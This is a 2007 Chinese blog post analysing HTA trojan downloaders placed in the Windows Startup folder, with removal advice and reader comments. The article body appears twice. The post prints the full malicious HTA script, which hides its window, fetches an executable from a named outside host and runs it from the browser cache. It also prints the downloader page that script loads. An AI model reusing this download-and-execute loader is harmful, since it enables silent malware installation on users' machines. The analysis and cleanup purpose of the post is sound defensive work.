订阅
上一篇
下一篇
Windows.hta Server.hta 病毒简单分析及解决办法
作者:hesper 日期:2007-06-22
最近几天接连遇见HTA(HTML Application的缩写,HTML应用程序)编写的病毒下载器,主要是以下这两个:
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\Windows.hta
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\Server.hta
以Windows.hta为例,看下代码:
=============================================================
<html><body><script>window.moveTo(4000,4000);window.resizeTo(0,0);var shell=new ActiveXObject("wscript.shell");shell.Run("C:\\Progra~1\\Intern~1\\IEXPLORE.EXE http://www.if56.cn/lo/downmm.html",0,0);function runmm(){var path=shell.SpecialFolders("MyDocuments");var savepath=path.substring(0,path.lastIndexOf("\\"));savepath+="\\Local Settings\\Temporary Internet Files\\Content.IE5\\";var sp=new ActiveXObject("shell.application");var Folders=sp.NameSpace(savepath);for(i=0;i<Folders.Items().Count;i++){var Folder=Folders.Items().Item(i).Path;Folder+="\\abc[1].exe";try{shell.Exec(Folder);}catch(e){};}window.close();};shell.Run("cmd.exe /c tree c:\\ /f",0,1);runmm();</script></body></html>
=============================================================
程序随机自启动,成功执行后连接到地址http://www.if56.cn/lo/downmm.html下载木马,downmm.html代码如下:
=============================================================
<html>
<title>
downmm
</title>
<script src="abc.exe"></script>
<body>
start download.............................
</body>
</html>
=============================================================
这个abc.exe经过avast扫描,发现木马病毒:WIN32:Nilage-AI
解决办法:
如果防火墙提示Windows.hta 或 Server.hta 访问网络,即是中毒的表现,解决办法很简单,删除C:\Documents and Settings\All Users\「开始」菜单\程序\启动\里面的文件即可。( 如何查看系统属性隐藏文件 )
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\Windows.hta
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\Server.hta
以Windows.hta为例,看下代码:
=============================================================
<html><body><script>window.moveTo(4000,4000);window.resizeTo(0,0);var shell=new ActiveXObject("wscript.shell");shell.Run("C:\\Progra~1\\Intern~1\\IEXPLORE.EXE http://www.if56.cn/lo/downmm.html",0,0);function runmm(){var path=shell.SpecialFolders("MyDocuments");var savepath=path.substring(0,path.lastIndexOf("\\"));savepath+="\\Local Settings\\Temporary Internet Files\\Content.IE5\\";var sp=new ActiveXObject("shell.application");var Folders=sp.NameSpace(savepath);for(i=0;i<Folders.Items().Count;i++){var Folder=Folders.Items().Item(i).Path;Folder+="\\abc[1].exe";try{shell.Exec(Folder);}catch(e){};}window.close();};shell.Run("cmd.exe /c tree c:\\ /f",0,1);runmm();</script></body></html>
=============================================================
程序随机自启动,成功执行后连接到地址http://www.if56.cn/lo/downmm.html下载木马,downmm.html代码如下:
=============================================================
<html>
<title>
downmm
</title>
<script src="abc.exe"></script>
<body>
start download.............................
</body>
</html>
=============================================================
这个abc.exe经过avast扫描,发现木马病毒:WIN32:Nilage-AI
解决办法:
如果防火墙提示Windows.hta 或 Server.hta 访问网络,即是中毒的表现,解决办法很简单,删除C:\Documents and Settings\All Users\「开始」菜单\程序\启动\里面的文件即可。( 如何查看系统属性隐藏文件 )
文章来自: 
引用通告地址: 
Tags: 评论: 2 | 引用: 0 | 查看次数: 4540
- 1
hesper [2007-06-29 01:54 PM]应该是可以删除的,我删除正常,你在试试看安全模式能删不?
可是我删除不了啊怎么办
- 1
发表评论
